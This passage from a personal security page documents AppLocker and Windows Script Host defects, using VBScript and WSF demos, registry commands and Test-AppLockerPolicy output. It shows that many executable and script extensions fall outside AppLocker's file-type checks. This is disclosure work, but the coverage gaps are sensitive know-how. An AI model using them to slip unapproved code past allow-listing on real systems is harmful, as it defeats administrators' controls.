WScript.Echo Hash2Text(.CalculateFileHash(WScript.ScriptName))
WScript.Echo Hash2Text(.CalculateFileHash(WScript.FullName))
WScript.Echo
WScript.Echo .DecodeFilePublisherInformation("CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US")
WScript.Echo .EncodeFilePublisherInformation("CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US", vbTrue)
WScript.Echo
WScript.Echo .CompileRule("<FilePathRule Action='Allow' Description='' Id='00000000-0000-0000-0000-000000000000' Name='' UserOrGroupSid='S-1-5-32-544'><Conditions><FilePathCondition Path='*' /></Conditions></FilePathRule>")
WScript.Echo .CompileRule("<FilePublisherRule Action='Allow' Description='' Id='00000000-0000-0000-0000-000000000000' Name='' UserOrGroupSid='S-1-1-0'><Conditions><FilePublisherCondition BinaryName='*' ProductName='*' PublisherName='CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US'><BinaryVersionRange HighSection='65535.65535.65535.65535' LowSection='0.0.0.0' /></FilePublisherCondition></Conditions></FilePublisherRule>")
End With
WScript.Quit 0
Function Hash2Text(Hash)
Dim int, asc, str
For int = 1 To LenB(Hash)
asc = AscB(MidB(Hash, int, 1))
If asc < 16 Then str = str & "0"
str = str & Hex(asc)
Next
Hash2Text = str
End Function
]]>
</script>
</job>
</package> Execute the
JScript
from the first job of the
Windows Script File
whisper.wsf created in step 2. to demonstrate the
handler methods:
CSCRIPT.EXE //Job:Handler whisper.wsf
Microsoft (R) Windows Script Host, Version 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. <AppLockerPolicy Version="1"/> <AppLockerPolicy Version="1"/>
Execute the
VBScript
from the second job of the
Windows Script File
whisper.wsf created in step 2. to demonstrate the
helper methods:
CSCRIPT.EXE //Job:Helper whisper.wsf
Microsoft (R) Windows Script Host, Version 5.8
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
0 whisper.wsf
1 C:\Windows\System32\cscript.exe
0 C:\Windows\System32
Exe com,exe
Dll dll
Msi msi,msp
Script bat,cmd,js,ps1,vbs
whisper.wsf = %OSDRIVE%\USERS\STEFAN\DESKTOP\WHISPER.WSF
C:\Windows\System32\cscript.exe = %SYSTEM32%\CSCRIPT.EXE
C7AFE4127307150B2E024FB1EFCFE33C4F2BFCAAFBDA74E5E161233022BA0327
0A242026DA1DF243E88C2D56FC7A77CF04F65513075968F010E213046E64465E
CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
D:(XA;;FX;;;BA;(APPID://PATH Contains "*"))
D:(XA;;FX;;;WD;((Exists APPID://FQBN) && ((APPID://FQBN >= {"CN=MICROSOFT CORPORATION, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*\*", 0}) && (APPID://FQBN <= {"CN=MICROSOFT CORPORATION, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*\*", 18446744073709551615}))))
�
REG.EXE IMPORT whisper.reg
The operation completed successfully.
Create the text file whisper.vbs with the following
content in the same directory:
Rem Copyright © 2009-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
Option Explicit
Const strLDAPPath = "" ' ldap://ad-dc.example.org/CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=Example,DC=Org
Const strXMLPolicy = "<AppLockerPolicy Version='1' />"
With WScript.CreateObject("AppIdPolicyEngineApi.AppIdPolicyHandler")
WScript.Echo .GetEffectivePolicy
WScript.Echo .GetPolicy(strLDAPPath)
' WScript.Echo .SetPolicy(strLDAPPath, strXMLPolicy)
End With Register the missing
ProgIDs
AppIdPolicyEngineApi.AppIdPolicyHandler and
AppIdPolicyEngineApi.AppIdPolicyHandler.1, then execute
the
VBScript
whisper.vbs created in step 6. to display the
AppLocker
policies again:
REG.EXE ADD HKCR\AppIdPolicyEngineApi.AppIdPolicyHandler\CurVer /VE /T REG_SZ /D AppIdPolicyEngineApi.AppIdPolicyHandler.1
REG.EXE ADD HKCR\AppIdPolicyEngineApi.AppIdPolicyHandler.1\CLSID /VE /T REG_SZ /D {F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}
CSCRIPT.EXE whisper.vbs
Note: the command lines can be copied and pasted as
block into a Command Processor window.
The operation completed successfully. The operation completed successfully. Microsoft (R) Windows Script Host, Version 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. <AppLockerPolicy Version="1"/> <AppLockerPolicy Version="1"/>
Overwrite the text file whisper.vbs created in
step 5. with the following content:
Rem Copyright © 2009-2026, Stefan Kanthak <stefan.kanthak@nexgo.de>
Option Explicit
Const FILE_TYPE_NOT_SUPPORTED = 0
Const FILE_TYPE_EXE = 1
Const FILE_TYPE_DLL = 2
Const FILE_TYPE_WINDOWS_INSTALLER = 3
Const FILE_TYPE_SCRIPT = 4
With WScript.CreateObject("AppIdPolicyEngineApi.AppIdPolicyHelper")
WScript.Echo .GetFileType(WScript.ScriptName) & vbTab & WScript.ScriptName
WScript.Echo .GetFileType(WScript.FullName) & vbTab & WScript.FullName
WScript.Echo .GetFileType(WScript.Path) & vbTab & WScript.Path
WScript.Echo
WScript.Echo .GetFileRuleCollection(FILE_TYPE_EXE) & vbTab & .GetFileExtensions(FILE_TYPE_EXE)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_DLL) & vbTab & .GetFileExtensions(FILE_TYPE_DLL)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_WINDOWS_INSTALLER) & vbTab & .GetFileExtensions(FILE_TYPE_WINDOWS_INSTALLER)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_SCRIPT) & vbTab & .GetFileExtensions(FILE_TYPE_SCRIPT)
WScript.Echo
WScript.Echo WScript.ScriptName & " = " & .NormalizeFilePath(WScript.ScriptName)
WScript.Echo WScript.FullName & " = " & .NormalizeFilePath(WScript.FullName)
WScript.Echo
WScript.Echo Hash2Text(.CalculateFileHash(WScript.ScriptName))
WScript.Echo Hash2Text(.CalculateFileHash(WScript.FullName))
WScript.Echo
WScript.Echo .DecodeFilePublisherInformation("CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US")
WScript.Echo .EncodeFilePublisherInformation("CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US", vbTrue)
WScript.Echo
WScript.Echo .CompileRule("<FilePathRule Action='Allow' Description='' Id='00000000-0000-0000-0000-000000000000' Name='' UserOrGroupSid='S-1-5-32-544'><Conditions><FilePathCondition Path='*' /></Conditions></FilePathRule>")
WScript.Echo .CompileRule("<FilePublisherRule Action='Allow' Description='' Id='00000000-0000-0000-0000-000000000000' Name='' UserOrGroupSid='S-1-1-0'><Conditions><FilePublisherCondition BinaryName='*' ProductName='*' PublisherName='CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US'><BinaryVersionRange HighSection='65535.65535.65535.65535' LowSection='0.0.0.0' /></FilePublisherCondition></Conditions></FilePublisherRule>")
End With
Function Hash2Text(Hash)
Dim int, asc, str
For int = 1 To LenB(Hash)
asc = AscB(MidB(Hash, int, 1))
If asc < 16 Then str = str & "0"
str = str & Hex(asc)
Next
Hash2Text = str
End Function Register the missing
ProgIDs
AppIdPolicyEngineApi.AppIdPolicyHelper and
AppIdPolicyEngineApi.AppIdPolicyHelper.1, then execute
the
VBScript
whisper.vbs overwritten in step 7. to demonstrate
the helper methods again:
REG.EXE ADD HKCR\AppIdPolicyEngineApi.AppIdPolicyHelper\CurVer /VE /T REG_SZ /D AppIdPolicyEngineApi.AppIdPolicyHandler.1
REG.EXE ADD HKCR\AppIdPolicyEngineApi.AppIdPolicyHelper.1\CLSID /VE /T REG_SZ /D {0AEA3667-1039-43FF-8D21-B1A162090671}
CSCRIPT.EXE whisper.vbs
The operation completed successfully.
The operation completed successfully.
Microsoft (R) Windows Script Host, Version 5.8
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
4 whisper.vbs
1 C:\Windows\System32\cscript.exe
0 C:\Windows\System32
Exe com,exe
Dll dll
Msi msi,msp
Script bat,cmd,js,ps1,vbs
whisper.vbs = %OSDRIVE%\USERS\STEFAN\DESKTOP\WHISPER.VBS
C:\Windows\System32\cscript.exe = %SYSTEM32%\CSCRIPT.EXE
60E51D76C652B4DFA204BDCA182818EA42B67F8BC11B344A87C0B6CB9CF919F2
0A242026DA1DF243E88C2D56FC7A77CF04F65513075968F010E213046E64465E
CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
D:(XA;;FX;;;BA;(APPID://PATH Contains "*"))
D:(XA;;FX;;;WD;((Exists APPID://FQBN) && ((APPID://FQBN >= {"CN=MICROSOFT CORPORATION, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*\*", 0}) && (APPID://FQBN <= {"CN=MICROSOFT CORPORATION, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*\*", 18446744073709551615}))))
An AppLocker rule collection is a set of rules that apply to one of five types:OUCH¹: this documentation fails to enumerate at least the well-known file extensions
Executable files: .exe and .com
Windows Installer files: .msi, .mst and .msp
Scripts: .ps1, .bat, .cmd, .vbs, and .js
DLLs: .dll and .ocx
Packaged apps and Packaged app installers: .appx
.scr for screen saver
executables, .msix for
Windows Installer
files, .vbe,
.jse,
.wsc,
.wsf,
.wsh and
.sct for scripts, plus
.acm,
.ax,
.drv,
.ime,
.mui,
.tsp,
.wll,
.xll and
.cpl for
DLLs!
OUCH²: at least executable files, script files run by Windows Script Host and DLLs may have an arbitrary or no file extension at all!
The documentation for the
Test-AppLockerPolicy
PowerShell
cmdlet specifies:
The Test-AppLockerPolicy cmdlet uses the specified AppLocker policy to test whether a specified list of files are allowed to run on the local computer for a specific user.CAVEAT: this documentation specifies neither preconditions nor restrictions for the file paths to test!Syntax
Test-AppLockerPolicy [-PolicyObject] <AppLockerPolicy> [-Path <String[]>] [-User <String>] [-Filter <PolicyDecision[]>] [<CommonParameters>] Test-AppLockerPolicy [-XMLPolicy] <String> [-Path <String>] [-User <String>] [-Filter <FilterType>] [<CommonParameters>]Parameters
Parameter Description PolicyObject <AppLockerPolicy> Specifies the policy object that contains the AppLocker policy. It can be obtained from the Get-AppLockerPolicy or New-AppLockerPolicy cmdlet. XMLPolicy <String> The XML file path that contains the AppLocker policy. Path <String[]> Specifies the list of file paths to test. Supports regular expressions. User <String> Defines the user or group that the rules are applied to. You must provide one of the following property values:
- DNS user name (domain\username)
- User principal name (username@domain.com)
- Security identifier (S-1-5-21-3165297888-301567370-576410423-1103)
- SAM user name (username)
Filter <PolicyDecision[]> Filters the output by the policy decision for each input file. The policy decision options include: All, Allowed, Denied, DeniedByDefault, and AllowedByDefault. By default, all policy decisions are displayed.
Test-AppLockerPolicy
cmdlet and its cause.
Create the text file whisper.xml with the following
content in an arbitrary, preferable empty directory:
<?xml version='1.0' encoding='US-ASCII' standalone='yes' ?>
<AppLockerPolicy Version='1' /> Test file paths with the 12 file extensions specified in the first
documentation cited above against the empty allow all
AppLocker
policy whisper.xml created in step 1.:
PowerShell.exe /Command "Import-Module AppLocker; Test-AppLockerPolicy -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx"
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.exe" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.exe:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.com" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.com:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.msi" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.msi:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.mst" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.mst:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.msp" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.msp:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.ps1" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.ps1:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.bat" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.bat:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.cmd" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.cmd:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.vbs" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.vbs:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.js" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.js:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.dll" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.dll:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.ocx" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.ocx:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
OUCH¹: the
Test-AppLockerPolicy
cmdlet requires the files to exist unconditionally,
even for an (empty)
AppLocker
policy without
file hash
or
publisher
rules!
Create the files to test with arbitrary content, then repeat the command from step 2.:
FOR %? IN (whisper.exe whisper.com whisper.msi whisper.mst whisper.msp whisper.ps1 whisper.bat whisper.cmd whisper.vbs whisper.js whisper.dll whisper.ocx) DO @(1>%? ECHO %?) PowerShell.exe /Command "Import-Module AppLocker; Test-AppLockerPolicy -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx"
FilePath PolicyDecision MatchingRule -------- -------------- ------------ C:\Users\Stefan\Desktop\whisper.exe AllowedByDefault C:\Users\Stefan\Desktop\whisper.com AllowedByDefault C:\Users\Stefan\Desktop\whisper.msi AllowedByDefault Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.mst is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script. At line:1 char:46 + Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx + CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException + FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet C:\Users\Stefan\Desktop\whisper.msp AllowedByDefault C:\Users\Stefan\Desktop\whisper.ps1 AllowedByDefault C:\Users\Stefan\Desktop\whisper.bat AllowedByDefault C:\Users\Stefan\Desktop\whisper.cmd AllowedByDefault C:\Users\Stefan\Desktop\whisper.vbs AllowedByDefault C:\Users\Stefan\Desktop\whisper.js AllowedByDefault C:\Users\Stefan\Desktop\whisper.dll AllowedByDefault Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.ocx is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script. At line:1 char:46 + Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx + CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException + FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdletOUCH²: the
Test-AppLockerPolicy
cmdlet fails to support the file extensions
.mst and
.ocx
specified in the first documentation cited above!
Repeat the previous step 3. with (arbitrary) other file
extensions, for example
.scr,
.vbe and
.cpl mentioned above:
FOR %? IN (whisper.scr whisper.vbe whisper.cpl) DO @(1>%? ECHO %?) PowerShell.exe /Command "Import-Module AppLocker; Test-AppLockerPolicy -XMLPolicy whisper.xml -Path whisper.scr, whisper.vbe, whisper.cpl"
Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.scr is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.src, whisper.vbe, whisper.cpl
+ CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException
+ FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.vbe is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.scr, whisper.vbe, whisper.cpl
+ CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException
+ FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.cpl is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.scr, whisper.vbe, whisper.cpl
+ CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException
+ FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Create the text file whisper.wsf with the following
content in the same directory:
<?xml version='1.0' encoding='US-ASCII' standalone='yes' ?>
<job>
<object id='AppIdPolicyHelper' classid='clsid:0AEA3667-1039-43FF-8D21-B1A162090671' />
<script language='VBScript'>
<![CDATA[
Option Explicit
Dim strExtension
For Each strExtension In Array(".scr", _
".vbe", ".jse", ".wsc", ".wsf", ".wsh", ".sct", _
".acm", ".ax", ".drv", ".ime", ".mui", ".tsp", ".wll", ".xll", ".cpl", _
".")
WScript.Echo AppIdPolicyHelper.GetFileType(strExtension) & vbTab & strExtension
Next
WScript.Quit 0
]]>
</script>
</job> Execute the
Windows Script File
whisper.wsf created in step 5. to show the culprit
responsible for the misbehaviour:
CSCRIPT.EXE whisper.wsf
Microsoft (R) Windows Script Host, Version 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. 0 .scr 0 .vbe 0 .jse 0 .wsc 0 .wsf 0 .wsh 0 .sct 0 .acm 0 .ax 0 .drv 0 .ime 0 .mui 0 .tsp 0 .wll 0 .xll 0 .cpl 0 .OUCH³: the
GetFileType() helper
method, used by the
Test-AppLockerPolicy
cmdlet to determine which
rule collection
to evaluate, returns 0 alias FILE_TYPE_NOT_SUPPORTED
for any file extension except .exe,
.com,
.msi,
.msp,
.ps1,
.bat,
.cmd,
.vbs,
.js and
.dll!
Windows Script Host provides an environment in which users can execute scripts in a variety of languages, languages that use a variety of object models to perform tasks.Syntax
wscript[<scriptname>] [/b] [/d] [/e:<engine>] [{/h:cscript|/h:wscript}] [/i] [/job:<identifier>] [{/logo|/nologo}] [/s] [/t:<number>] [/x] [/?] [<ScriptArguments>]Parameters
Parameter Description … … /logo Specifies that the Windows Script Host banner is displayed in the console before the script runs. This is the default and the opposite of /nologo.
/nologo Specifies that the Windows Script Host banner is not displayed before the script runs. … … ScriptArguments Specifies the arguments passed to the script. Each script argument must be preceded by a slash (/). /? Displays Help at the command prompt.
![[Screen shot of 'Windows Script Host' help message box from Windows 7]](download/WHISPER2.PNG "Screen shot of 'Windows Script Host' help message box from Windows 7")
OUCH¹: the script host options
/logo alias //logo and
/nologo alias //nologo have no function,
their highlighted descriptions are misleading and
wrong – the
Windows Based Script Host
WScript.exe
never displays a banner!
OUCH²: contrary to the highlighted statement
for ScriptArguments only named script
arguments must be preceded by a (single) slash –
unnamed script arguments must not
be preceded by a slash!
OUCH³: instead of the help text at the command
prompt the script host option /? alias //?
displays the message box shown to the right!
Note: options for the script hosts can and of
course should always be preceded by
two slashes to distinguish and also placed in front
of the script filename to separate them from (named) arguments for
the script!
Use the X.509 certificate to send S/MIME encrypted mail.
Note: email in weird format and without a proper sender name is likely to be discarded!
I dislike
HTML (and even
weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your
nickname.
I abhor top posts and expect inline quotes in replies.
as iswithout any warranty, neither express nor implied.
cookiesin the web browser.
The web service is operated and provided by
Telekom Deutschland GmbH The web service provider stores a session cookie
in the web
browser and records every visit of this web site with the following
data in an access log on their server(s):